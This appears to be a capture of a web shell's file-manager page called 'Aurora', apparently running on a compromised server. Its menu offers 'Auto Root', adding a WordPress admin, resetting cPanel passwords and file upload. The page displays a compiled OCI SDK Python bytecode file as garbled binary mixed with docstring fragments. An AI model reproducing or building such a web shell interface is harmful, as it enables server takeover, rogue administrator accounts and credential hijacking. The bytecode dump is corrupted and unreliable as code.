Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
lib
python3.9
site-packages
oci
data_flow
models
__pycache__
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: change_sql_endpoint_compartment_details.cpython-39.pyc
a ���f� � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ sJ e Zd ZdZdd� Zedd� �Zejdd� �Zdd� Zd d � Z dd� Z d S )�#ChangeSqlEndpointCompartmentDetailszA Details for changing the compartment of a SQL Endpoint. c K s ddi| _ ddi| _d| _dS )a� Initializes a new ChangeSqlEndpointCompartmentDetails object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param compartment_id: The value to assign to the compartment_id property of this ChangeSqlEndpointCompartmentDetails. :type compartment_id: str �compartment_id�strZ compartmentIdN)Z swagger_typesZ attribute_map�_compartment_id)�self�kwargs� r �`/usr/lib/python3.9/site-packages/oci/data_flow/models/change_sql_endpoint_compartment_details.py�__init__ s ��z,ChangeSqlEndpointCompartmentDetails.__init__c C s | j S )a **[Required]** Gets the compartment_id of this ChangeSqlEndpointCompartmentDetails. The OCID of the compartment into which the resource should be moved. :return: The compartment_id of this ChangeSqlEndpointCompartmentDetails. :rtype: str �r �r r r r r &